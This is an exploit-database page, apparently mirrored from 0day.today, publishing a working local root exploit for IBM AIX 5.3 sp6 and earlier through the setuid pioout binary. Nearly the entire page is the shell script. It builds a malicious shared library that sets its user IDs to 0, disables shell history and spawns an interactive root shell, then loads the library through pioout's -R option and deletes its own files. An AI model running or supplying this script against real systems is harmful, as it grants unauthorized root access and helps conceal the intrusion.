IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit

🗓️ 27 Jul 2007 00:00:00Reported by qaazType

zdt🔗 0day.today👁 21 Views

IBM AIX 5.3 sp6 pioout Library Loading Local Root Exploi

======================================================================
IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit
======================================================================



#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
	seteuid(0);
	setuid(0);
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", (void *) 0);
	execl("/bin/sh", "sh", "-i", (void *) 0);
	perror("execl");
	exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib



#  0day.today [2018-01-02]  #

27 Jul 2007 00:00Current

6.8Medium risk

Vulners AI Score6.8